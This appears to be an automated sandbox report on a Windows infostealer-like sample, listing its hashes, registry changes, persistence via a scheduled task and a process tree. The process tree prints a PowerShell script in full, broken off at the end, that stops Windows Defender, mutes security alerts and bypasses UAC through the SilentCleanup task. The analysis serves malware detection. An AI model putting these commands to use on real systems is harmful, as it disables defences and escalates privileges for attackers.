Analysis
-
max time kernel
110s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2022 23:20
Static task
static1
Behavioral task
behavioral1
Sample
0ee108a8e3b9cddad2cceb2648072fe2.exe
Resource
win7-20220812-en
General
-
Target
0ee108a8e3b9cddad2cceb2648072fe2.exe
-
Size
415KB
-
MD5
0ee108a8e3b9cddad2cceb2648072fe2
-
SHA1
fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9
-
SHA256
4672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7
-
SHA512
1456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449
-
SSDEEP
12288:mF4ioOyjRGILz+N8vmI/v8GpRyWgDy6QG:2ZoOyjMqLN+W9G
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3584 created 656 3584 powershell.exe lsass.exe -
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" svchost.exe -
Executes dropped EXE 1 IoCs
Processes:
svchost.exepid process 2312 svchost.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
0ee108a8e3b9cddad2cceb2648072fe2.exesvchost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation 0ee108a8e3b9cddad2cceb2648072fe2.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe -
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" svchost.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 73 ip-api.com 71 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exepid process 3124 sc.exe 4004 sc.exe 3744 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3364 2312 WerFault.exe svchost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 svchost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4608 timeout.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
0ee108a8e3b9cddad2cceb2648072fe2.exesvchost.exepid process 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe 2312 svchost.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
Processes:
0ee108a8e3b9cddad2cceb2648072fe2.exesvchost.exepowershell.exewhoami.exepowershell.exewhoami.exedescription pid process Token: SeDebugPrivilege 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe Token: SeDebugPrivilege 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe Token: SeDebugPrivilege 2312 svchost.exe Token: SeDebugPrivilege 2312 svchost.exe Token: SeDebugPrivilege 3584 powershell.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 2392 whoami.exe Token: SeDebugPrivilege 3188 powershell.exe Token: SeDebugPrivilege 4436 whoami.exe Token: SeDebugPrivilege 4436 whoami.exe Token: SeDebugPrivilege 4436 whoami.exe Token: SeDebugPrivilege 4436 whoami.exe Token: SeDebugPrivilege 4436 whoami.exe Token: SeDebugPrivilege 4436 whoami.exe Token: SeDebugPrivilege 4436 whoami.exe Token: SeDebugPrivilege 4436 whoami.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
svchost.exepid process 2312 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0ee108a8e3b9cddad2cceb2648072fe2.execmd.execmd.exesvchost.exepowershell.exepowershell.execmd.exedescription pid process target process PID 2136 wrote to memory of 3476 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 2136 wrote to memory of 3476 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 2136 wrote to memory of 3476 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 2136 wrote to memory of 5036 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 2136 wrote to memory of 5036 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 2136 wrote to memory of 5036 2136 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 3476 wrote to memory of 208 3476 cmd.exe schtasks.exe PID 3476 wrote to memory of 208 3476 cmd.exe schtasks.exe PID 3476 wrote to memory of 208 3476 cmd.exe schtasks.exe PID 5036 wrote to memory of 4608 5036 cmd.exe timeout.exe PID 5036 wrote to memory of 4608 5036 cmd.exe timeout.exe PID 5036 wrote to memory of 4608 5036 cmd.exe timeout.exe PID 5036 wrote to memory of 2312 5036 cmd.exe svchost.exe PID 5036 wrote to memory of 2312 5036 cmd.exe svchost.exe PID 5036 wrote to memory of 2312 5036 cmd.exe svchost.exe PID 2312 wrote to memory of 3584 2312 svchost.exe powershell.exe PID 2312 wrote to memory of 3584 2312 svchost.exe powershell.exe PID 2312 wrote to memory of 3584 2312 svchost.exe powershell.exe PID 3584 wrote to memory of 3124 3584 powershell.exe sc.exe PID 3584 wrote to memory of 3124 3584 powershell.exe sc.exe PID 3584 wrote to memory of 3124 3584 powershell.exe sc.exe PID 3584 wrote to memory of 3456 3584 powershell.exe cmd.exe PID 3584 wrote to memory of 3456 3584 powershell.exe cmd.exe PID 3584 wrote to memory of 3456 3584 powershell.exe cmd.exe PID 3584 wrote to memory of 2392 3584 powershell.exe whoami.exe PID 3584 wrote to memory of 2392 3584 powershell.exe whoami.exe PID 3584 wrote to memory of 2392 3584 powershell.exe whoami.exe PID 3584 wrote to memory of 1776 3584 powershell.exe net1.exe PID 3584 wrote to memory of 1776 3584 powershell.exe net1.exe PID 3584 wrote to memory of 1776 3584 powershell.exe net1.exe PID 3584 wrote to memory of 4048 3584 powershell.exe net1.exe PID 3584 wrote to memory of 4048 3584 powershell.exe net1.exe PID 3584 wrote to memory of 4048 3584 powershell.exe net1.exe PID 3584 wrote to memory of 3188 3584 powershell.exe powershell.exe PID 3584 wrote to memory of 3188 3584 powershell.exe powershell.exe PID 3584 wrote to memory of 3188 3584 powershell.exe powershell.exe PID 3188 wrote to memory of 4004 3188 powershell.exe sc.exe PID 3188 wrote to memory of 4004 3188 powershell.exe sc.exe PID 3188 wrote to memory of 4004 3188 powershell.exe sc.exe PID 3188 wrote to memory of 968 3188 powershell.exe cmd.exe PID 3188 wrote to memory of 968 3188 powershell.exe cmd.exe PID 3188 wrote to memory of 968 3188 powershell.exe cmd.exe PID 3188 wrote to memory of 4436 3188 powershell.exe whoami.exe PID 3188 wrote to memory of 4436 3188 powershell.exe whoami.exe PID 3188 wrote to memory of 4436 3188 powershell.exe whoami.exe PID 3188 wrote to memory of 3496 3188 powershell.exe net1.exe PID 3188 wrote to memory of 3496 3188 powershell.exe net1.exe PID 3188 wrote to memory of 3496 3188 powershell.exe net1.exe PID 3188 wrote to memory of 3744 3188 powershell.exe sc.exe PID 3188 wrote to memory of 3744 3188 powershell.exe sc.exe PID 3188 wrote to memory of 3744 3188 powershell.exe sc.exe PID 2312 wrote to memory of 2924 2312 svchost.exe cmd.exe PID 2312 wrote to memory of 2924 2312 svchost.exe cmd.exe PID 2312 wrote to memory of 2924 2312 svchost.exe cmd.exe PID 2924 wrote to memory of 2192 2924 cmd.exe chcp.com PID 2924 wrote to memory of 2192 2924 cmd.exe chcp.com PID 2924 wrote to memory of 2192 2924 cmd.exe chcp.com PID 2924 wrote to memory of 3144 2924 cmd.exe netsh.exe PID 2924 wrote to memory of 3144 2924 cmd.exe netsh.exe PID 2924 wrote to memory of 3144 2924 cmd.exe netsh.exe PID 2924 wrote to memory of 1576 2924 cmd.exe findstr.exe PID 2924 wrote to memory of 1576 2924 cmd.exe findstr.exe PID 2924 wrote to memory of 1576 2924 cmd.exe findstr.exe PID 2312 wrote to memory of 2308 2312 svchost.exe cmd.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" svchost.exe -
outlook_office_path 1 IoCs
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe -
outlook_win_path 1 IoCs
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\0ee108a8e3b9cddad2cceb2648072fe2.exe"C:\Users\Admin\AppData\Local\Temp\0ee108a8e3b9cddad2cceb2648072fe2.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB3A5.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks computer location settings
- Accesses Microsoft Outlook profiles
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
